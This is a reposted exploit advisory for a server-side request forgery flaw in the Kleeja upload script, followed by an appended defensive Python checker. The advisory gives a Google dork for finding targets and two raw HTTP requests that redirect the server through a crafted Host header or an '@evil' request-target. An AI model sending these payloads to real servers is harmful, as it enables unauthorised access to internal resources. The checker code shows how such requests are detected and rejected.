
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020090122

Below is a copy:

Upload Kleeja Server Side Request Forgery (SSRF)
# Exploit Title: Server Side Request Forgery (SSRF) in Upload Kleeja
# Google Dork: Powered by Kleeja
# Date: 21 - 07 - 2020
# Exploit Author: Saud
# Software Link: https://github.com/kleeja-official
# Version: All
# Homepage: http://kleeja.net/
# Tested on: Version 2.4
# CVE : CVE-2018-1042

evil = example SSRF target

Example exploitation request:
-----------------------------------------------------------------------
GET /up/go.php?go=stats HTTP/1.1
Host: saud.com:[email protected]
Pragma: no-cache
Cache-Control: no-cache, no-transform
Connection: close
-----------------------------------------------------------------------

or

-----------------------------------------------------------------------
GET @evil/ HTTP/1.1
Host: saud.com
Pragma: no-cache
Cache-Control: no-cache, no-transform
Connection: close
-----------------------------------------------------------------------





### [ Contacts: ]
[#] Telegram: @x0Saudi
[#] Twitter: @Dmaral3noz
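
A defensive check for the two request shapes shown above, as an added example that is not part of the advisory or of Kleeja's code: it rejects a Host header that is not plain host[:port] and a request-target that is not origin-form. The allowlist, hostnames and function name are assumptions, and the sample requests are constructed.

```python
import re

# Assumption: hostnames this site is legitimately served under.
ALLOWED_HOSTS = {"uploads.example.test"}

# Host must be host[:port]; RFC 7230 allows no userinfo ("user@") here.
HOST_RE = re.compile(r"^(?P<host>[A-Za-z0-9.-]+)(?::\d{1,5})?$")

# Constructed samples mirroring the request shapes in the advisory.
SAMPLES = {
    "normal": "GET /up/go.php?go=stats HTTP/1.1\r\n"
              "Host: uploads.example.test\r\n\r\n",
    "userinfo_host": "GET /up/go.php?go=stats HTTP/1.1\r\n"
                     "Host: uploads.example.test:80@other.example\r\n\r\n",
    "at_target": "GET @other.example/ HTTP/1.1\r\n"
                 "Host: uploads.example.test\r\n\r\n",
}


def check_request(raw):
    """Return the reasons a raw HTTP/1.1 request head should be rejected."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0].split("\n")
    parts = head[0].split(" ")
    if len(parts) != 3:
        return ["malformed request line"]
    method, target, _version = parts
    reasons = []
    # Strict origin-server policy (assumption): only "/path" targets,
    # plus "*" for OPTIONS. Absolute-form targets are refused too.
    if not target.startswith("/") and (method, target) != ("OPTIONS", "*"):
        reasons.append("request-target is not origin-form")
    hosts = [line.split(":", 1)[1].strip() for line in head[1:]
             if line.lower().startswith("host:")]
    if len(hosts) != 1:
        return reasons + ["expected exactly one Host header"]
    match = HOST_RE.match(hosts[0])
    if match is None:
        reasons.append("Host is not host[:port]")
    elif match.group("host").lower() not in ALLOWED_HOSTS:
        reasons.append("Host not in allowlist")
    return reasons


if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(name, check_request(raw) or "ok")
```

The same two rules can be enforced at a reverse proxy or web server in front of the application, so malformed requests never reach PHP.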
